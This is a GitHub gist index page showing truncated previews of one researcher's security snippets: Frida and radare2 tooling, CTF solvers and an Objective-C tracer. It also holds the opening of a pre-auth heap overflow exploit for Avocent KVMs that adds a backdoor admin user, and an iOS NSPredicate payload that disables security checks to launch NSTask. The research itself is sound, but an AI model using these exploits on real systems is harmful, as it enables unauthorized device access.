Skip to content

Instantly share code, notes, and snippets.

@aemmitt-ns
aemmitt-ns / svc_hook.js
Last active June 13, 2024 21:49
frida script to hook arm64 syscalls
const module = Process.getModuleByName("app_name");
const syscallbytes = "011000d4c0035fd6" // svc 0x80; ret;
Process.setExceptionHandler((e) => {
if (e.type == "breakpoint") {
// do stuff here
e.context.pc = e.context.pc.add(4); // advance to after bp
return true;
} else {
return false;
@aemmitt-ns
aemmitt-ns / asmpwn.py
Last active December 30, 2023 15:08
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
global socks # python closes out of scope sockets
port = 3211 # port is hardcoded in the binary
usernm = username.encode()
@aemmitt-ns
aemmitt-ns / ida.rs
Last active June 5, 2023 16:39
use radius2 api to solve IDA ctf challenge
use radius2::{Radius, RadiusOption, State, vc};
fn main() {
let options = [RadiusOption::SimAll(true)];
let mut radius = Radius::new_with_options(Some("challenge"), &options);
let mut state = radius.callsym_state("main");
let flag = state.symbolic_value("flag", 8*0x18);
state.constrain_bytes(&flag, "[ -~]");
radius.set_argv_env(&mut state, &[vc(0), flag.clone()], &[]);
@aemmitt-ns
aemmitt-ns / restricted.m
Created May 19, 2023 14:06
program to dump out forbidden classes and selectors in NSPredicates
// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>
int main() {
void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
NSLog(@"Restricted Selectors: %@", RestrictedSelectors());
@aemmitt-ns
aemmitt-ns / funtime.js
Last active December 30, 2023 06:26
funtime: detailed objective-c runtime tracing. ex `python funtime.py -n Messages '-[NSRegularExpression *]'`
const typeMap = {
"c": "char",
"i": "int",
"s": "short",
"l": "long",
"q": "long long",
"C": "unsigned char",
"I": "unsigned int",
"S": "unsigned short",
@aemmitt-ns
aemmitt-ns / .radare2rc
Created November 22, 2022 20:43
r2 GEF style context
"$c=?e ------------------------------------ registers -----------------------------------;?e;dr=;?e;?e ------------------------------------ disassem ------------------------------------;?e;pdi 8;?e;?e ------------------------------------ stack ---------------------------------------;?e;pxr 128@SP;?e;?e ----------------------------------------------------------------------------------;"
"$ds=ds;$c"
"$dc=dc;$c"
@aemmitt-ns
aemmitt-ns / quinefuck.m
Last active October 14, 2023 19:36
a brainfuck interpreter made with an NSExpression that evaluates on itself. idk.
// yields brainfuck when quined
char *h = "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]"
">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++."; // -> Hello World!
#import <Foundation/Foundation.h>
int main(int argc, char *argv[]) {
NSString *program = [NSString stringWithUTF8String: argc > 1 ? argv[1] : h];
NSMutableArray *prog = [NSMutableArray array]; // make the program into an array cuz its easier
for (int i = 0; i < program.length; i++) {
NSString *c = [program substringWithRange: NSMakeRange(i, 1)];
if ([@".,<>-+[]" rangeOfString: c].location != NSNotFound) [prog addObject: c];
@aemmitt-ns
aemmitt-ns / unplugged_apps.json
Created July 28, 2022 22:36
list of apps on the unplugged "app store" returned from /api/store/app?size=10000
[
{
"applicationId": "com.unplugged.antivirus",
"applicationName": "UP Antivirus",
"applicationType": "TOOLS",
"description": "Keep your device clean from malware and viruses in realtime",
"versionName": "2.22.9",
"versionCode": 84,
"privacyRating": 5,
"iconUrl": "https://up-apps-demo.s3.eu-west-1.amazonaws.com/antivirus/icon/logo.png",
@aemmitt-ns
aemmitt-ns / nspredpayload.m
Last active December 30, 2023 06:26
NSPredicate payload for iOS that disables security checks and launches an NSTask
NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging
// use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way
"$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue,"
"$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags
"$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce
"$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes
"$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors
"$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class
"$NSPipe := $NSTask - 0x41a0," // address of NSPipe class
@aemmitt-ns
aemmitt-ns / main.rs
Last active June 10, 2022 02:57
ollvm challenge solution
use radius2::{Radius, State, Value, vc};
// output:
// FLAG: mirror_mirror_on_the_wall_whos_the_ugliest_handler_of_them_all?!
// target/release/ollvm 0.92s user 0.04s system 99% cpu 0.964 total
const HASHES:[u64; 8] = [
0x875cd4f2e18f8fc4, 0xbb093e17e5d3fa42, 0xada5dd034aae16b4, 0x97322728fea51225,
0x4124799d72188d0d, 0x2b3e3fbbb4d44981, 0xdfcac668321e4daa, 0xeac2137a35c8923a
];